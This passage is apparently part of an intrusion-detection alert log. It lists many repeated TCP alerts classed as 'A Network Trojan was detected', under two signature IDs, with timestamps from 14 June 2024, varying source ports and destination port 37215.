                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858288
                SID:2829579
                Source Port:50492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.984898
                SID:2829579
                Source Port:54730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.670210
                SID:2835222
                Source Port:37556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618729
                SID:2835222
                Source Port:44332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.344197
                SID:2835222
                Source Port:39252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421816
                SID:2835222
                Source Port:47400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.967812
                SID:2829579
                Source Port:38240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504737
                SID:2829579
                Source Port:43692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274894
                SID:2835222
                Source Port:46748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.880869
                SID:2835222
                Source Port:34260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.031708
                SID:2829579
                Source Port:44932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791084
                SID:2835222
                Source Port:51816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452061
                SID:2829579
                Source Port:56136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914840
                SID:2829579
                Source Port:54682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.737191
                SID:2835222
                Source Port:55172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.071972
                SID:2829579
                Source Port:52596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850484
                SID:2829579
                Source Port:33748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.164624
                SID:2829579
                Source Port:36912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182446
                SID:2829579
                Source Port:58248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545368
                SID:2829579
                Source Port:38246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846712
                SID:2829579
                Source Port:52476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.180154
                SID:2835222
                Source Port:45640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.521517
                SID:2829579
                Source Port:37810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761325
                SID:2829579
                Source Port:58804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074928
                SID:2829579
                Source Port:59050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325668
                SID:2829579
                Source Port:57602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942691
                SID:2829579
                Source Port:56510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.384973
                SID:2829579
                Source Port:38544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.548795
                SID:2835222
                Source Port:36676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150862
                SID:2829579
                Source Port:55712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.253434
                SID:2835222
                Source Port:53764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146474
                SID:2829579
                Source Port:47006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.906521
                SID:2829579
                Source Port:48586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.408738
                SID:2829579
                Source Port:49462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.830911
                SID:2829579
                Source Port:59380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791523
                SID:2829579
                Source Port:60016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943047
                SID:2835222
                Source Port:36012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.032239
                SID:2829579
                Source Port:38086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453112
                SID:2835222
                Source Port:49706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.667567
                SID:2835222
                Source Port:40290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.289025
                SID:2829579
                Source Port:51422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806869
                SID:2829579
                Source Port:35444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.295553
                SID:2835222
                Source Port:52834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.055793
                SID:2835222
                Source Port:45846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.163103
                SID:2835222
                Source Port:38844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.338532
                SID:2829579
                Source Port:33098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616026
                SID:2835222
                Source Port:44764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.862125
                SID:2835222
                Source Port:37274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859575
                SID:2829579
                Source Port:35678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.896393
                SID:2835222
                Source Port:60582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202086
                SID:2835222
                Source Port:52060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276179
                SID:2829579
                Source Port:41336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.243037
                SID:2829579
                Source Port:40538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274369
                SID:2829579
                Source Port:50334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471240
                SID:2835222
                Source Port:58480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453836
                SID:2835222
                Source Port:42916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011324
                SID:2835222
                Source Port:36822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943897
                SID:2829579
                Source Port:35376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.918036
                SID:2829579
                Source Port:60390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.831280
                SID:2829579
                Source Port:36712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663486
                SID:2835222
                Source Port:44374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779535
                SID:2829579
                Source Port:57904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323813
                SID:2829579
                Source Port:36072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701643
                SID:2835222
                Source Port:53912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.291701
                SID:2835222
                Source Port:49698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805037
                SID:2829579
                Source Port:34256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.419487
                SID:2829579
                Source Port:35762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.941995
                SID:2829579
                Source Port:44216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807518
                SID:2829579
                Source Port:52586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073753
                SID:2835222
                Source Port:44562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134845
                SID:2829579
                Source Port:46276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614192
                SID:2835222
                Source Port:48700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.624790
                SID:2829579
                Source Port:34398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.246095
                SID:2829579
                Source Port:38150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777360
                SID:2829579
                Source Port:50394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735415
                SID:2829579
                Source Port:46382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.010699
                SID:2835222
                Source Port:35852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879908
                SID:2835222
                Source Port:50120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.057307
                SID:2835222
                Source Port:57704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411018
                SID:2835222
                Source Port:37922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503033
                SID:2835222
                Source Port:50666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502102
                SID:2835222
                Source Port:44498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.726077
                SID:2835222
                Source Port:54458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.091243
                SID:2829579
                Source Port:43848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.338082
                SID:2835222
                Source Port:37924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879047
                SID:2829579
                Source Port:44146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018009
                SID:2829579
                Source Port:56790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.544317
                SID:2835222
                Source Port:57886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.032721
                SID:2829579
                Source Port:42162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660377
                SID:2835222
                Source Port:38568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.055453
                SID:2835222
                Source Port:58480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.811335
                SID:2829579
                Source Port:41264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849050
                SID:2835222
                Source Port:54756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777820
                SID:2835222
                Source Port:57580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471750
                SID:2835222
                Source Port:41104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915320
                SID:2835222
                Source Port:46936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.717459
                SID:2835222
                Source Port:46416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.880908
                SID:2829579
                Source Port:55012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013223
                SID:2835222
                Source Port:35812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111246
                SID:2835222
                Source Port:42312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.689618
                SID:2835222
                Source Port:36942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942170
                SID:2829579
                Source Port:54170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023553
                SID:2829579
                Source Port:59920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201809
                SID:2829579
                Source Port:56594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185298
                SID:2835222
                Source Port:45908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.081815
                SID:2835222
                Source Port:35570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.273135
                SID:2835222
                Source Port:43118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790553
                SID:2835222
                Source Port:40484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761099
                SID:2835222
                Source Port:54208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470246
                SID:2835222
                Source Port:50936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.033783
                SID:2829579
                Source Port:45992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.646489
                SID:2835222
                Source Port:41916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.643340
                SID:2829579
                Source Port:40320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133721
                SID:2835222
                Source Port:46078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134032
                SID:2829579
                Source Port:46780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.544230
                SID:2829579
                Source Port:46434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849191
                SID:2835222
                Source Port:52788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766173
                SID:2829579
                Source Port:53240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023431
                SID:2829579
                Source Port:52196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761827
                SID:2829579
                Source Port:36238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.689518
                SID:2829579
                Source Port:33220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761684
                SID:2829579
                Source Port:37020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.147148
                SID:2835222
                Source Port:44052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072387
                SID:2829579
                Source Port:49326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.290604
                SID:2829579
                Source Port:50732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916196
                SID:2835222
                Source Port:39216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.683937
                SID:2829579
                Source Port:39006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850238
                SID:2829579
                Source Port:50444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660871
                SID:2829579
                Source Port:56634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662002
                SID:2835222
                Source Port:35740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.294081
                SID:2829579
                Source Port:34214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504953
                SID:2835222
                Source Port:39722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717584
                SID:2835222
                Source Port:39448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.932410
                SID:2835222
                Source Port:41480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.718414
                SID:2835222
                Source Port:52380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410905
                SID:2829579
                Source Port:46392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979576
                SID:2829579
                Source Port:56068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.546326
                SID:2835222
                Source Port:34780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.685105
                SID:2835222
                Source Port:40354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519770
                SID:2835222
                Source Port:51572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761881
                SID:2829579
                Source Port:34358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.685303
                SID:2835222
                Source Port:40206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024796
                SID:2835222
                Source Port:45996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501263
                SID:2829579
                Source Port:42776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735947
                SID:2835222
                Source Port:47066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.999807
                SID:2835222
                Source Port:38940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381161
                SID:2829579
                Source Port:54782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663151
                SID:2835222
                Source Port:53274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.882346
                SID:2835222
                Source Port:53836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.758982
                SID:2829579
                Source Port:60046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.408674
                SID:2829579
                Source Port:60664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763079
                SID:2835222
                Source Port:55334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.110926
                SID:2835222
                Source Port:34656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.568597
                SID:2829579
                Source Port:59982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275847
                SID:2835222
                Source Port:42976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.087878
                SID:2829579
                Source Port:57258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.759491
                SID:2835222
                Source Port:59552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.640827
                SID:2829579
                Source Port:42756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185553
                SID:2835222
                Source Port:45970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410477
                SID:2835222
                Source Port:42654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.968764
                SID:2829579
                Source Port:46270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276286
                SID:2835222
                Source Port:39794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915454
                SID:2835222
                Source Port:57300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943137
                SID:2835222
                Source Port:50238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.145995
                SID:2835222
                Source Port:36522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.082214
                SID:2835222
                Source Port:36770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452882
                SID:2829579
                Source Port:48030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916946
                SID:2829579
                Source Port:57324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.778073
                SID:2835222
                Source Port:34750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.562927
                SID:2829579
                Source Port:43140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669255
                SID:2835222
                Source Port:52818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858759
                SID:2829579
                Source Port:51196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.640726
                SID:2829579
                Source Port:56746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849921
                SID:2835222
                Source Port:56390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517590
                SID:2835222
                Source Port:54732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.829935
                SID:2835222
                Source Port:57882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201680
                SID:2835222
                Source Port:57432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146025
                SID:2835222
                Source Port:58870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.563869
                SID:2829579
                Source Port:41744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.226035
                SID:2829579
                Source Port:59154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.326679
                SID:2835222
                Source Port:42742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.244551
                SID:2835222
                Source Port:47690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.646923
                SID:2835222
                Source Port:35448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915041
                SID:2835222
                Source Port:55984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.228877
                SID:2835222
                Source Port:51204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.131679
                SID:2835222
                Source Port:54738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.386267
                SID:2835222
                Source Port:53678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.568701
                SID:2835222
                Source Port:39008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.448812
                SID:2835222
                Source Port:56694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.054037
                SID:2829579
                Source Port:46846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.419924
                SID:2829579
                Source Port:49302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.670838
                SID:2829579
                Source Port:50394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.725276
                SID:2835222
                Source Port:52034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.226826
                SID:2835222
                Source Port:33136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967951
                SID:2835222
                Source Port:60828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018982
                SID:2829579
                Source Port:33276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184536
                SID:2835222
                Source Port:40344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
